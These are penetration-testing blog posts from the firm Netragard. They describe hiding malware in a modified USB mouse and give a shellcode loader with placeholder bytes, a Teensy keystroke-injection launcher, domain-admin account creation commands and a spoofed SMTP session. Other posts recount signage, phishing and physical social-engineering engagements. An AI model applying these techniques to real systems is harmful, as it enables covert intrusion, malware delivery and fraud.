Posts Tagged ‘penetration test’

Netragard’s Hacker Interface Device (HID).

We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services whatsoever. It also excluded the use of social attack vectors based on social networks, telephone, or email, and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating the network from the perspective of a remote threat, and we succeeded.

The first method of attack that people might think of when faced with a challenge like this is the traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug one in; when they do, it's game over, they're infected. That trick worked great back in the day, but not so much anymore. The first issue is that most people are well aware of the USB stick threat thanks to the many published articles on the subject. The second is that more and more companies are pushing out group policies that disable the autorun feature on Windows systems. Those two things don't eliminate the USB stick threat, but they do have a significant impact on its rate of success, and we wanted something more reliable.
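
For reference, that group policy hardening typically boils down to a single registry value. Here's a minimal sketch of the corresponding .reg file (assuming a standard Windows environment of the era; the value 0xFF disables autorun for all drive types):

    Windows Registry Editor Version 5.00

    ; Disable autorun for all drive types (0xFF = all)
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    "NoDriveTypeAutoRun"=dword:000000ff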

Enter PRION, the evil HID.



A prion is an infectious agent composed of a protein in a misfolded form. In our case the prion isn't composed of proteins; instead it's composed of electronics, which include a Teensy microcontroller, a micro USB hub (a small one from RadioShack), a mini USB cable (we needed the ends), a micro flash drive (made from one of our Netragard USB Streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a mouse, missile turret, dancing stripper, chameleon, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.

For the purposes of this engagement we chose a fancy Logitech USB mouse as our Hacker Interface Device / Attack Platform. To turn our Logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. The first step, of course, was to remove the screw from the bottom of the mouse and pop it open. Once we did that, we disconnected the USB cable from the circuit board in the mouse and put it to the side. Then we proceeded to use a Dremel tool to shave away the extra plastic on the inside cover of the mouse (there were all sorts of tabs that we could sacrifice). The removal of the plastic tabs was to make room for the new hardware.

Once the top of the mouse was gutted and all the unnecessary parts removed, we began to focus on the USB hub. The first thing we had to do was extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together, and we didn't want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out of the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (being careful not to burn the board). Once those were extracted, we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small Bic lighter.

With the mouse and the USB board prepared, we began the process of soldering. The first thing that we did was take the mini USB cable and cut one of the ends off, leaving about 1 inch of wire near the connector. Then we stripped all the plastic off of the connector and stripped a small amount of insulation from the 4 internal wires. We soldered those four wires to the USB board, making sure to follow the right pinout pattern (see below). This is the cable that plugs into the Teensy's mini USB port when we insert the Teensy microcontroller.
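
For anyone attempting something similar, the standard USB 2.0 wire colors are worth keeping on hand (cheap cables don't always follow the convention, so verify with a multimeter before soldering):

  • Red: VBUS (+5 V)
  • White: D− (Data −)
  • Green: D+ (Data +)
  • Black: GND (ground)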

Once that was finished, we took the USB cable that came with the mouse and cut the circuit board connector off of the end, leaving 2 inches of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub, again following the right pinout pattern mentioned above. This is an important cable, as it's the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that connects the mouse to the USB port on the computer.

At this point we had three cables soldered to the USB hub. Just to recap, those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the Teensy device. The next and most challenging part was to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn't soldered on properly then we won't be able to store our malware on the drive, and the attack would be mostly moot. (We say mostly because we could still instruct the mouse to fetch the malware from a website, but that's not covert.)

To solder the flash drive to the USB hub, we cut about 2 inches of cable from the mini USB connector that we stole the end from previously. We stripped the ends of the wires in the cable and carefully soldered them to the correct points on the flash drive. Once that was done, we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving ourselves the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape to avoid any shorts. Once everything was plugged in, we tested the devices. The USB drive mounted, the Teensy was programmable, and the mouse worked.

Time to give prion the ability to infect…

We learned that the client was using McAfee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren't allowed to use social networks for social engineering, but we certainly were allowed to do reconnaissance against social networks. With McAfee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). We wanted our malware to be able to connect back to Metasploit because we love the functionality, and we also wanted the capabilities provided by meterpreter, but we needed more than that. We needed our malware to be fully undetectable and to subvert the "Do you want to allow this connection" dialog box entirely. You can't do that with encoding…

Update: As of 06/29/2011 9AM EST, this variant of our pseudo-malware is being detected by McAfee.

Update: As of 06/29/2011 10:47AM EST, we've created a new variant that seems to bypass any AV.

To make this happen, we created a meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up, and injected it into a wrapper of our own. The wrapper used an undocumented (0-day) technique to completely subvert the dialog box and to evade detection by McAfee. When we ran our tests on a machine running McAfee, the malware ran without a hitch. We should point out that our ability to evade McAfee isn't an indication of its quality; we can evade any antivirus solution using similar custom attack methodologies. After all, it's impossible to detect something if you don't know what it is that you're looking for. (It also helps to have a team of researchers at our disposal.)
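
For readers unfamiliar with the general approach, here is a minimal, heavily simplified sketch of the textbook pattern for running a meterpreter C array from a wrapper. To be clear, this is not the undocumented technique described above (which we are not disclosing), and the payload bytes below are placeholders; a real buffer would be the C output of msfpayload, which we've elided:

    /* loader.c -- generic in-memory payload loader (illustrative sketch only) */
    #include <windows.h>
    #include <string.h>

    /* Placeholder bytes (NOP; RET); the real array is the elided msfpayload C output */
    unsigned char payload[] = { 0x90, 0xC3 };

    int main(void)
    {
        /* Allocate memory marked executable so the copied payload can run */
        void *mem = VirtualAlloc(NULL, sizeof(payload),
                                 MEM_COMMIT | MEM_RESERVE,
                                 PAGE_EXECUTE_READWRITE);
        if (mem == NULL)
            return 1;

        memcpy(mem, payload, sizeof(payload));

        /* Hand control to the payload */
        ((void (*)(void))mem)();
        return 0;
    }

Note that this naive pattern is exactly what antivirus products look for; it's shown only to illustrate the mechanics, not the evasion.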

Once we had our malware built, we loaded it onto the flash drive that we had soldered into our mouse. Then we wrote some code for the Teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was adapted from Adrian Crenshaw's website; he deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.
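
We aren't publishing prion's actual launcher, but the following Teensyduino-style sketch illustrates the general idea (built with the USB Type set to include Keyboard). The drive letter and file name are assumptions made for the example, and the flat delay is a crude stand-in for the user-activity trigger; Crenshaw's PHUKD library offers smarter triggers:

    /* prion_sketch.ino -- illustrative Teensy HID launcher (not the real payload) */
    void setup() {
      delay(60000);  /* crude stand-in for "60 seconds after user activity" */

      /* Open the Windows Run dialog (Win+R) */
      Keyboard.set_modifier(MODIFIERKEY_GUI);
      Keyboard.set_key1(KEY_R);
      Keyboard.send_now();

      /* Release all keys */
      Keyboard.set_modifier(0);
      Keyboard.set_key1(0);
      Keyboard.send_now();
      delay(500);

      /* Type the path to the payload on the embedded flash drive and press Enter.
         The drive letter is an assumption; a real attack must locate the drive. */
      Keyboard.println("E:\\update.exe");
    }

    void loop() {
      /* Nothing to do; the work happens once in setup() */
    }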

Usage: Plug mouse into computer, get pwned.

The final step was to ship the mouse to our customer. One of the most important aspects of this was repacking the mouse in its original packaging so that it appeared unopened. Then we used Jigsaw to purchase a list of our client's employees. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse to look like a promotional gadget, added fake marketing flyers, etc., then shipped it. Sure enough, three days later the mouse called home.



Netragard Signage Snatching

Recently Netragard has had a few discussions with owners and operators of sports arenas, with the purpose of identifying methods by which a malicious hacker could potentially disrupt a sporting event, concert, or other large-scale and highly visible event.

During the course of these conversations, the topic shifted from network exploitation to social engineering, with a focus on compromise of the digital signage systems. Until recently, even I hadn't thought about how extensively network-controlled signage systems are used in facilities like casinos, sports arenas, airports, and roadside billboards. That is, until our most recent casino project.

Netragard recently completed a Network Penetration Test and Social Engineering Test for a large west coast casino, with spectacular results. Not only were our engineers able to gain the keys to the kingdom, they were also able to gain access to the systems that had supervisory control over every single digital sign in the facility. Some people may think to themselves, "OK, what's the big deal with that?" The answer is simple: customer perception and corporate image.

Before I continue, let me provide some background. Early in 2008, there were two incidents in California where on-highway digital billboards were compromised and their displays changed from the intended content. While both of these incidents were small pranks in comparison to what they could have been, the effect was remembered by those who drove by and saw the signs. (Example A, Example B)

Another recent billboard hack, in Moscow, Russia, wasn't as polite as the pranksters in California. A hacker was able to gain control of a billboard in downtown Moscow (worth noting, Moscow is the 7th largest city in the world) and, after gaining access, looped a clip of pornographic video. (Example C) Imagine if this had been a sports organization, and this happened during a major game.

Bringing this post back on track, let's refocus on the casino and the potential impact of signage compromise. After spending time in the signage control server, we determined that there were over 40 unique displays available to control, some of which were over 100″ in size. With customer permission, we placed a unique image on a small sign for proof-of-concept purposes (go Google "stallowned"). This test, coupled with an impact audit, clearly highlighted to the casino that securing their signage systems was nearly as important as securing their security systems, cage systems, and domain controllers. All the domain security in the world means little to a customer if they're presented with disruptive material on the signage during their visit to the casino. A compromise of this nature could cause significant loss of revenue, and cause a customer to never revisit the casino.

I also thought it pertinent, for the purpose of this post, to share another customer engagement story. This story highlights how physical security can be compromised by a combination of social engineering and network exploitation, thus opening an additional risk vector that could allow for compromise of the local network running the digital display systems.

Netragard was engaged by a large bio-sciences company in late 2010 to assess the network and physical security of multiple locations belonging to a business unit that was a new acquisition. During the course of this engagement, Netragard was able to take complete control of their network infrastructure remotely, as is the case in most of our engagements. Moreover, our engineers were able to use their social engineering skills to "convince" the physical site staff to grant them building access. Once past this first layer of physical security, by combining social and network exploitation they were subsequently able to gain access to sensitive labs and document storage rooms. These facilities and rooms were key to the organization's intellectual property and ongoing research. Had our engineers been hired by a competing company or other entity, the IP (research data, trials data, and so forth) could easily have been spirited off company property and into unknown hands.

By combining network exploitation and social engineering, we've postulated to the sports arena operators that Netragard has a high probability of gaining access to the control systems for their digital signage. Inevitably, during these discussions the organizations push back, stating that their facilities have trained security staff and access control systems. To that we respond that the majority of sports facility staff are attuned to illicit access attempts in controlled areas only during certain periods of operation, such as active games, concerts, and other large-scale events. During non-public hours, though, there's a high probability that a skilled individual could gain entry to access-controlled areas during a private event, or through a breach of trust, such as posing as a repair technician, emergency services employee, or even a facility employee.

One area of concern for any organization, whether it be a football organization, a Fortune 100 company, or a mid-size business, is breach of trust with its consumer base. For a major sports organization, the level of national exposure and endearment far exceeds the exposure most Netragard customers have to the public. Because of this extremely high national exposure, a sports organization and its arena are a prime target for those who may consider highly visible public disruption of games a key tool in furthering a socio-political agenda. We're hopeful that these organizations will continue to take a more serious stance to ensure that their systems and public image are as protected as possible.

– Mike Lockhart, VP of Operations


The Human Vulnerability

It seems to us that one of the biggest threats that businesses face today is socially augmented malware attacks. These attacks have an extremely high degree of success because they target and exploit the human element. Specifically, it doesn’t matter how many protective technology layers you have in place if the people that you’ve hired are putting you at risk, and they are.

Case in point: the "here you have" worm, which propagates predominantly via e-mail and promises the recipient access to PDF documents or even pornographic material. This specific worm compromised major organizations such as NASA, ABC/Disney, Comcast, Google, Coca-Cola, etc. How much money do you think those companies spend on security technology over a one-year period? How much good did it do at protecting them from the risks introduced by the human element? (Hint: none)

Here at Netragard we have a unique perspective on the issue of malware attacks because we offer pseudo-malware testing services. Our pseudo-malware module, when activated, authorizes us to test our clients with highly customized, safe, controlled, and homegrown pseudo-malware variants. To the best of our knowledge we are the only penetration testing company to offer such a service (and no, we’re not talking about the meterpreter).

Attack delivery usually involves attaching our pseudo-malware to emails or binding the pseudo-malware to PDF documents or other similar file types. In all cases we make it a point to pack (or crypt) our pseudo-malware so that it doesn’t get detected by antivirus technology (see this blog entry on bypassing antivirus). Once the malware is activated, it establishes an encrypted connection back to our offices and provides us with full control over the victim computer. Full control means access to the software and hardware including but not limited to keyboard, mouse, microphone and even the camera. (Sometimes we even deliver our attacks via websites like this one by embedding attacks into links).

So how easy is it to penetrate a business using pseudo-malware? Well, in truth, it's really easy. Just last month we finished delivering an advanced external penetration test for one of our more secure customers. We began crafting an email that contained our pseudo-malware attachment and accidentally hit the send button without any message content. Within 45 seconds of sending our otherwise blank email, we had 15 inbound connections from 15 newly infected client computer systems. That means that at least 15 employees tried to open our pseudo-malware attachment despite the fact that the email was blank! Imagine the degree of success that is possible with a well-crafted email.

One of the computer systems that we were able to compromise was running a service with domain admin privileges. We were able to use that computer system (an impersonation attack was involved) to create an account for ourselves on the domain (which happened to be the root domain). From there we were able to compromise the client's core infrastructure (switches, firewalls, etc.) thanks to a password file that we found sitting on someone's desktop (thank you for that). Once that was done, there really wasn't much left to do; it was game over.
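
Creating that domain account, once you're operating with domain admin privileges, takes nothing more exotic than the built-in Windows tooling. The account name and password below are hypothetical, shown purely to illustrate the step:

    C:\> net user pentest S0mePassw0rd! /add /domain
    C:\> net group "Domain Admins" pentest /add /domain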

The fact of the matter is that there's nothing new about taking advantage of people who are willing to do stupid things. But is it really stupidity, or is it just that employees don't have a sense of accountability? Our experience tells us that in most cases a lack of accountability is the culprit.

When we compromise a customer using pseudo-malware, one of the recommendations that we make to them is that they enforce policies by holding employees accountable for violations. We think that the best way to do that is to require employees to read a well-crafted policy and then to take a quiz based on that policy. When they pass the quiz they should be required to sign a simple agreement that states that they have read the policy, understood the policy, and agree to be held accountable for any violations that they make against the policy.

In our experience there is no better security technology than a paranoid human that is afraid of being held accountable for doing anything irresponsible (aka: violating the policy). When people are held accountable for something like security they tend to change their overall attitude towards anything that might negatively affect it. The result is a significantly reduced attack surface. If all organizations took this strict approach to policy enforcement then worms like the “here you have” worm wouldn’t be such a big success.

Compare the cost and benefit of enforcing a strict, carefully designed security policy to the cost and benefit of expensive (and largely ineffective) security technologies. Which do you think will do a better job of protecting your business from real threats? It's much more difficult to hack a network that is managed by people who are held accountable for its security than it is to hack a network that is protected by technology alone.

So in the end there’s really nothing special about the “here you have” worm. It’s just another example of how malicious hackers are exploiting the same human vulnerability using an ever so slightly different malware variant. Antivirus technology certainly won’t save you and neither will other expensive technology solutions, but a well-crafted, cost-effective security policy just might do the trick.

It's important to remember that well-written security policies don't only impact human behavior; they generally result in better management of systems, which translates to better technological security. The benefits are significant, and the overall cost, by comparison, isn't.


Professional Script Kiddies vs Real Talent

The Good Guys in the security world are no different from the Bad Guys; most of them are nothing more than glorified Script Kiddies. The fact of the matter is that if you took all of the self-proclaimed hackers in the world and subjected them to a litmus test, very few would pass as actual hackers.

This is true for both sides of the so-called Black and White Hat coin. In the Black Hat world, you have script kiddies who download programs written by other people and then use those programs to "hack" into networks. The White Hats do the exact same thing, only they buy the expensive tools instead of downloading them for free. Or maybe they're actually paying for the pretty GUI, who knows?

What is pitiable is that in just about all cases these script kiddies have no idea what the programs actually do. Sometimes that's because they don't bother to look at the code, but most of the time it's because they just can't understand it. If you think about it, that is scary. Do you really want to work with a security company that launches attacks against your network with tools it doesn't fully understand? I sure wouldn't.

This is part of the reason why I feel that it is so important for any professional security services provider to maintain an active research team. I'm not talking about doing market research and pretending that it's security research, like so many security companies do. I'm talking about doing actual vulnerability research and exploit development to help educate people about risks for the purposes of defense. After all, if a security company can't write an exploit, then what business does it have launching exploits against your company?

I am very proud to say that Everything Channel recently released its 2010 CRN Security Researchers list and that Netragard's Kevin Finisterre was on it. The other people included in the list are people for whom I have the utmost respect. As far as I am concerned, these are some of the best guys in the industry (clearly the list is not all-inclusive and in no way includes all of the people who deserve credit for their contributions and/or talent):

  • Dino Dai Zovi
  • Kevin Finisterre
  • Landon Fuller
  • Robert Graham
  • Jeremiah Grossman
  • Larry Highsmith
  • Billy Hoffman
  • Mikko Hypponen
  • Dan Kaminsky
  • Paul Kocher
  • Nate Lawson
  • David Litchfield
  • Charles Miller
  • Jeff Moss
  • Jose Nazario
  • Joanna Rutkowska

In the end I suppose it all boils down to what the customer wants. Some customers want to know their risks; others just want to put a check in the box. For those who want to know what their real risks are, you’ve come to the right place.


Social Engineering — It's Nothing New

With all the recent hype about Social Engineering, we figured we'd chime in and tell people what's really going on. The fact is that Social Engineering is nothing more than a Confidence Trick carried out by a Con Artist. The only difference between the terms Social Engineering and Confidence Trick is that Social Engineering is predominantly used in relation to technology.

So what is it really? Social Engineering is the act of exploiting a person’s natural tendency to trust another person or entity. Because the vulnerability exists within people, there is no truly effective method for remediation. That is not to say that you cannot protect your sensitive data, but it is to say that you cannot always prevent your people or even yourself from being successfully conned.

The core ingredients required to perform a successful confidence trick are no different today than they were before the advent of the Internet. The con artist must gain the victim's trust, and then trick the victim into performing an action or divulging information. The Internet certainly didn't create the risk, but it does make it easier for the threat to align with the risk.

Before the advent of the Internet, the con artist (threat) needed to contact the victim (risk) via telephone, in person, via snail mail, etc. Once contact was made, a good story needed to be put into place and the victim's trust needed to be earned. That process could take months or even years, and even then success wasn't guaranteed.

The advent of the Internet provided the threat with many more avenues through which it could successfully align with the risk. Specifically, the Internet enables the threat to align with hundreds or even thousands of risks simultaneously. That sort of shotgun approach couldn't be done before, and it significantly increases an attacker's chances of success. One of the most elementary examples of this shotgun approach is the email-based phishing attack.

The email-based phishing attack doesn't earn the trust of its victims; it steals trust from existing relationships. Those relationships might exist between the victim and their bank, a family member, a co-worker, an employer, etc. In all instances the email-based phishing attack hinges on the attacker's ability to send emails that look like they are coming from a trusted source (exploitation of trust). From a technical perspective, email spoofing and phishing are trivial (click here for a more sophisticated attack example).
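
Just how trivial? The following SMTP session is purely illustrative: the hostnames and addresses are made up, and it assumes a mail server that relays without verifying the sender, as was common at the time. The protocol simply believes whatever the sender claims:

    $ nc mail.victim-bank.example 25
    220 mail.victim-bank.example ESMTP
    HELO attacker.example
    250 mail.victim-bank.example
    MAIL FROM:<ceo@victim-bank.example>
    250 2.1.0 Ok
    RCPT TO:<employee@victim-bank.example>
    250 2.1.5 Ok
    DATA
    354 End data with <CR><LF>.<CR><LF>
    From: "The CEO" <ceo@victim-bank.example>
    To: <employee@victim-bank.example>
    Subject: Urgent: please review the attached document

    (message body here)
    .
    250 2.0.0 Ok: queued
    QUIT
    221 2.0.0 Bye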

The reason why it is possible for an attacker to steal trust from a victim instead of earning that trust is because “face to face” trust isn’t portable to the Internet. For example, most people trust their spouse. Many people talk to their spouse on AIM, MSN, Yahoo, Skype, etc. while at work. How do they know that they are really chatting with their spouse and not a hacker?

So how do you protect against the social risks and prevent the threat from successfully aligning with those risks? The truth is that you can't. Con artists have been conning people since the dawn of man. The better question is: what are you doing to protect your data from the hacker who does penetrate your IT infrastructure?


ROI of good security.

The cost of good security is a fraction of the cost of damages that usually result from a single successful compromise. When you choose the inexpensive security vendor, you are getting what you pay for. If you are looking for a check in the box instead of good security services, then maybe you should re-evaluate your thinking because you might be creating a negative Return on Investment.

Usually a check in the box means that you comply with some sort of regulation, but that doesn't mean that you are actually secure. As a matter of fact, almost all networks that contain credit card information and are successfully hacked are PCI compliant (a real example). That goes to show that compliance doesn't protect you from hackers; it only protects you from auditors and the fines that they can impose. What's more, those fines are only a small fraction of the cost of the damages that can be caused by a single successful hack.

When a computer system is hacked, the hacker doesn't stop at one computer. Standard hacker practice is to perform Distributed Metastasis and propagate the penetration throughout the rest of the network. This means that within a matter of minutes the hacker will likely have control over most or all of the critical aspects of your IT infrastructure and will also have access to your sensitive data. At that point you've lost the battle… but you were compliant, you paid for the scan, and now you've got a negative Return on that Investment ("ROI").

So what are the damages? It's actually impossible to determine the exact cost in damages that results from a single successful hack, because it's impossible to be certain of the full extent of the compromise. Nevertheless, here are some of the areas to consider when attempting to calculate damages:

  • Man hours to identify every compromised device
  • Man hours to reinstall and configure every device
  • Man hours to check source code for malicious alterations
  • Man hours to monitor network traffic for signs of malicious traffic or access
  • Man hours to educate customers
  • Penalties and fines
  • The cost of downtime
  • The cost of lost customers
  • The cost of a damaged reputation
  • etc.

(The damages could *easily* exceed half a million dollars on a network of only ~50 computers.)

Now let's consider the Return on Investment of *good* security. An Advanced Penetration Test against a small IT infrastructure (~50 computers in total) might cost somewhere around $16,000 to $25,000 for an 80-hour project. If that service is delivered by a quality vendor, it will enable you to identify and eliminate your risks before they are exploited by a malicious hacker. The ROI of the quality service is equal to the cost in damages of a single successful compromise minus the cost of the services. Not to mention you'd be compliant too…
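
To put rough, purely illustrative numbers on that using the figures above: if a single compromise of a ~50-machine network causes $500,000 in damages and the penetration test costs $25,000, the return is $500,000 − $25,000 = $475,000 in avoided losses, or about 19 times the fee.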

(Note: the actual cost of services varies quite a bit depending on what needs to be done, etc.)

So why is it that some vendors will do this work for $500.00 or $2,000.00, etc.? It's simple: they are not delivering the same quality of service as the quality vendor. When you pay $500.00 for a vulnerability scan, you are paying for something that you could do yourself for free (go download Nessus). In fact, when you pay $500.00 you are really only paying for about 5 minutes of manual labor; the rest of the work is automated and done by the tools. (If you broke that down to an hourly rate, you'd be paying something like $6,000.00 an hour, since you're paying $500.00 per 5 minutes.) In the end you might end up with a check in your compliance box, but you'll still be just as vulnerable as you were in the beginning.
